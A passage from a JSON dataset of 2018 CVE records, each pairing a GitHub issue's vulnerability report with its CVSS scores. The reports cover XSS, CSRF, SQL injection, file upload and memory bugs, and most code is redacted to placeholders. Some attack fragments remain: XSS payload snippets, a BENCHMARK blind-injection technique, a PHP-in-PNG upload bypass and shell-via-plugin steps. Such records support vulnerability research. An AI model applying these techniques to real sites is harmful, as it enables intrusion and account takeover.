        "Issue_Url_old": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
        "Issue_Url_new": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
        "Repo_new": "springjk/wordpress-wechat-broadcast",
        "Issue_Created_At": "2018-08-31T16:51:55Z",
        "description": "Vulnerability Local File Inclusion. This bug was found using the portal in the files: PATHTAG echo APITAG ? $_GET[\"url\"] : ''); The parameter \"url\" it is not sanitized allowing include local or remote files",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16298",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/23",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/23",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-08-31T06:54:34Z",
        "description": "APITAG NUMBERTAG has Another XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG while state=delete, draft, publish via tag parameter. Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG GET PATHTAG NUMBERTAG GET PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16299",
        "Issue_Url_old": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
        "Issue_Url_new": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
        "Repo_new": "julianburr/wp-plugin-localizemypost",
        "Issue_Created_At": "2018-08-31T22:48:13Z",
        "description": "Localize My Post Wordpress Vulnerability. Hello, There are a vulnerability on this plugin, I send you an email from EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16314",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/35",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/35",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-08-10T07:32:12Z",
        "description": "Admincp.php has a CSRF. When verifying CSRF_TOKEN, if CSRF_TOKEN does not exist, only refere information is validated, which can be bypassed by path masking. PAYLOAD APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Put the HTML file in the camouflaged refere PATHTAG Submit data packets, refere information is\uff1a Referer: FILETAG You can bypass refere validation FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16315",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/3",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/3",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-08-02T02:40:12Z",
        "description": "There is a CSRF vulnerability that can change the information of shop. After the administrator logged in, open the following the page poc\uff1a FILETAG //change the information of shop APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16320",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/41",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/41",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-08-27T03:43:37Z",
        "description": "Get shell by upload and install plugin.. Exploit Step APITAG the upload directory. APITAG the zip file which contain the exploit APITAG can download from the plugin store. APITAG the zip APITAG the install button and modify the request package as show below. APITAG the page which create by the evil zip file. FILETAG FILETAG FILETAG FILETAG FILETAG Suggetion : Never allow user to modify the path with \u2018../\u2018. I am requesting a cve id.I need your APITAG for your reading.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16325",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1284",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1284",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-07-12T04:03:56Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG create new page url: FILETAG title input payload APITAG FILETAG NUMBERTAG clike the link FILETAG NUMBERTAG ss cookie FILETAG FILETAG Release Info NUMBERTAG author by xijun. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16327",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/771",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/771",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-07-31T03:47:39Z",
        "description": "Validate admin panel URL config. Please add some rules for this config field as currently it can even store XSS payloads like ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16328",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1224",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1224",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-23T14:19:53Z",
        "description": "A null pointer dereferene in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG we can see a function APITAG APITAG , then the code use p >event_mask in the line NUMBERTAG but don't check the point p. In the function APITAG it will return NULL point if APITAG . In PATHTAG we can see the code check the value of option, but in PATHTAG we don't have this check.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16329",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1225",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1225",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-23T14:38:58Z",
        "description": "A null pointer dereferene might happend in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG the code has a assert to see whether image is null APITAG , but the condition still to be true if image_info is not null. And then in line NUMBERTAG comparing \"image\" to null implies that \"image\" might be null. The code don't do anything and it might to be a null pointer dereferene in switch case code like APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16330",
        "Issue_Url_old": "https://github.com/pandao/editor.md/issues/612",
        "Issue_Url_new": "https://github.com/pandao/editor.md/issues/612",
        "Repo_new": "pandao/editor.md",
        "Issue_Created_At": "2018-08-16T06:45:07Z",
        "description": "This editor is not fully filtered, causing XSS vulnerabilities. when We enter some strings,such as: APITAG APITAG '\"> The editor will execute XSS payload APITAG When some cms use this editor, it is easy to get administrator rights by using XSS attack.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16332",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/31",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/31",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-07-26T09:32:42Z",
        "description": "There is a CSRF vulnerability that admin can pass any person's article in iCMS NUMBERTAG Firstly any user write an article and publish,then find the article ID in MY ARTICLE menu. When admin click this URL,article will be passed. URL : URLTAG We can hide this URL poc : FILETAG APITAG id NUMBERTAG is the article ID.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16336",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/400",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/400",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-08-14T02:17:50Z",
        "description": "APITAG NUMBERTAG heap buffer overflow problems ( APITAG && bool APITAG APITAG char >(unsigned char )). Following bugs was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG ) both tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master ce NUMBERTAG ed NUMBERTAG exi NUMBERTAG POC POC1 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG fa NUMBERTAG bp NUMBERTAG fff NUMBERTAG f NUMBERTAG d0 sp NUMBERTAG fff NUMBERTAG f NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8dc1 in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8b3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG const&, int, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa POC2 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef3e at pc NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef3e thread T NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG in bool APITAG APITAG char >(unsigned char ) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ebd in std::iterator_traits<unsigned char >::difference_type std::__count_if<unsigned char , APITAG const> >(unsigned char , unsigned char , APITAG const>) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG d NUMBERTAG in std::iterator_traits<unsigned char >::difference_type std::count<unsigned char , char>(unsigned char , unsigned char , char const&) ( PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ef in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG f6f9e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafe NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef3e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG a5aa6b2 in operator APITAG long) ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ff NUMBERTAG eafb3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG bool APITAG APITAG char >(unsigned char ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16337",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/2",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/2",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2018-08-11T02:01:08Z",
        "description": "There is a CSRF vulnerability that can modify website basic configuration NUMBERTAG before modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG NUMBERTAG after modification FILETAG NUMBERTAG CSRF POC FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16338",
        "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/3",
        "Issue_Url_new": "https://github.com/auracms/auracms/issues/3",
        "Repo_new": "auracms/auracms",
        "Issue_Created_At": "2018-08-13T08:34:23Z",
        "description": "There is a cross site request forgery vulnerability in FILETAG . There is a cross site request forgery vulnerability in APITAG It and can change administrator's password. First: After the administrator logged in,open the poc page. FILETAG to FILETAG NUMBERTAG add page NUMBERTAG add APITAG topic NUMBERTAG add page FILETAG FILETAG NUMBERTAG add menu FILETAG FILETAG FILETAG NUMBERTAG submit topic FILETAG FILETAG NUMBERTAG CSRF POC: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16339",
        "Issue_Url_old": "https://github.com/sbmzhcn/EmpireCMS/issues/1",
        "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/1",
        "Repo_new": "leadscloud/empirecms",
        "Issue_Created_At": "2018-08-11T04:49:37Z",
        "description": "There is a CSRF vulnerability that can add administrator.. After the administrator logged in,open the poc page. copy FILETAG to FILETAG and let the administrator open the FILETAG vulnerability PATHTAG Before modification FILETAG FILETAG After modification FILETAG Poc location: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16342",
        "Issue_Url_old": "https://github.com/star7th/showdoc/issues/325",
        "Issue_Url_new": "https://github.com/star7th/showdoc/issues/325",
        "Repo_new": "star7th/showdoc",
        "Issue_Created_At": "2018-07-30T12:02:55Z",
        "description": "We found a stored xss vulnerability in APITAG Hello friend,we are farmsec security team,we found a stored xss vulnerability in APITAG APITAG to register FILETAG APITAG in user information FILETAG Click to register. APITAG a new project FILETAG Click new project. APITAG in the project information FILETAG Click submit. APITAG on the new project FILETAG Click on the new project xss test APITAG + to create a new page FILETAG APITAG in the xss vulnerability test payload payload: ERRORTAG Click save FILETAG Access page FILETAG APITAG the user's cookie information FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16345",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/5",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/5",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-07-26T03:55:04Z",
        "description": "There is two CSRF vulnerability that can add a ordinary user and update the administrator password. After the administrator logged in, open the following page poc: FILETAG update the admin password CODETAG FILETAG add a ordinary user CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16346",
        "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/2",
        "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/2",
        "Repo_new": "chemcms/chemcms",
        "Issue_Created_At": "2018-07-30T11:52:13Z",
        "description": "There is a xss vulnerability APITAG Privilege. A xss vulnerability was discovered in APITAG step NUMBERTAG login the backstage step NUMBERTAG go to the page setting >website information and fill the poc APITAG alert(\"xss\") APITAG to statistic code FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16347",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/798",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/798",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-08-09T08:17:45Z",
        "description": "There is a XSS vulnerability that can execute javascript. Founded in your demo site. URLTAG Visit this address with Firefox browser and it shows a forbidden page APITAG Then insert the payload APITAG alert NUMBERTAG APITAG then u can see this page alert NUMBERTAG at once. APITAG Obviously, some js code can be executed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16349",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/147",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/147",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-28T15:31:07Z",
        "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When administrators access the expansion module link, it triggers XSS vulnerability. FILETAG image URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16350",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/148",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/148",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-07-28T15:32:20Z",
        "description": "wuzhicms NUMBERTAG has a XSS vulnerability in form FILETAG CODETAG When an administrator accesses the CMS home page, it triggers a XSS vulnerability FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16352",
        "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/8",
        "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/8",
        "Repo_new": "alterebro/weaselcms",
        "Issue_Created_At": "2018-08-25T12:20:05Z",
        "description": "There is a .php file upload Vulnerbility. There is a .php file upload Vulnerbility in FILETAG FILETAG use mime type to forbidden php file is not safe,we can first edit the png file's name FILETAG then add the php code at the end FILETAG file was uploaded successfully! FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16353",
        "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/3",
        "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/3",
        "Repo_new": "focalhot/FHCRM",
        "Issue_Created_At": "2018-08-08T04:09:20Z",
        "description": "there is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16354",
        "Issue_Url_old": "https://github.com/focalhot/FHCRM/issues/4",
        "Issue_Url_new": "https://github.com/focalhot/fhcrm/issues/4",
        "Repo_new": "focalhot/FHCRM",
        "Issue_Created_At": "2018-08-08T08:25:20Z",
        "description": "There is a sql injection via PATHTAG FILETAG there is a sql injection via $limit parameter we can use the function BENCHMARK to excute blind injection payload: URLTAG PROCEDURE APITAG LIKE NUMBERTAG APITAG FILETAG the response time will be longer if the first the first number of mysql version is NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16362",
        "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/286",
        "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/286",
        "Repo_new": "mantisbt-plugins/source-integration",
        "Issue_Created_At": "2018-09-01T18:04:58Z",
        "description": "x.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16365",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/32",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/32",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-08-01T00:44:41Z",
        "description": "There is one CSRF vulnerability that can add the administrator account. Although the Token value is set, the Token value is displayed in the Get request and does not change. The system also has a referer detection, so the environment is set up on the server, bypassing the referer detection. Vulnerability PATHTAG poc\uff1a APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16367",
        "Issue_Url_old": "https://github.com/QingdaoU/OnlineJudge/issues/165",
        "Issue_Url_new": "https://github.com/qingdaou/onlinejudge/issues/165",
        "Repo_new": "qingdaou/onlinejudge",
        "Issue_Created_At": "2018-08-09T14:16:20Z",
        "description": "There is a incorrect access control vulnerability that can write file anywhere. \u5728\u63d0\u4ea4issue\u4e4b\u524d\u8bf7 \u8ba4\u771f\u9605\u8bfb\u6587\u6863 URLTAG \u641c\u7d22\u548c\u67e5\u770b\u5386\u53f2issues \u7136\u540e\u63d0\u4ea4issue\u8bf7\u5199\u6e05\u695a\u4e0b\u5217\u4e8b\u9879 \u00a0 \u8fdb\u884c\u4ec0\u4e48\u64cd\u4f5c\u7684\u65f6\u5019\u9047\u5230\u4e86\u4ec0\u4e48\u95ee\u9898\uff0c\u6700\u597d\u80fd\u6709\u590d\u73b0\u6b65\u9aa4 \u00a0 APITAG \u4f60\u5c1d\u8bd5\u4fee\u590d\u95ee\u9898\u7684\u64cd\u4f5c \u9875\u9762\u95ee\u9898\u8bf7\u5199\u6e05\u6d4f\u89c8\u5668\u7248\u672c\uff0c\u5c3d\u91cf\u6709\u622a\u56fe",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.9,
        "impactScore": 6.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2018-16371",
        "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/3",
        "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/3",
        "Repo_new": "lazyphp/pescms-team",
        "Issue_Created_At": "2018-08-30T15:30:44Z",
        "description": "PECSM TEAM NUMBERTAG has multiple reflected Cross Site Scripting Vulnerability. I found multiple reflected cross site scripting vulnerability where the page use FILETAG ,we can see where is no XSS filter in \"keyword\" parameter. FILETAG now I input payload :aa\"> APITAG the full url is : URLTAG and the code is running FILETAG and there are lots of pages use APITAG they all have reflected cross site scripting APITAG URLTAG URLTAG URLTAG URLTAG .. .. ..",
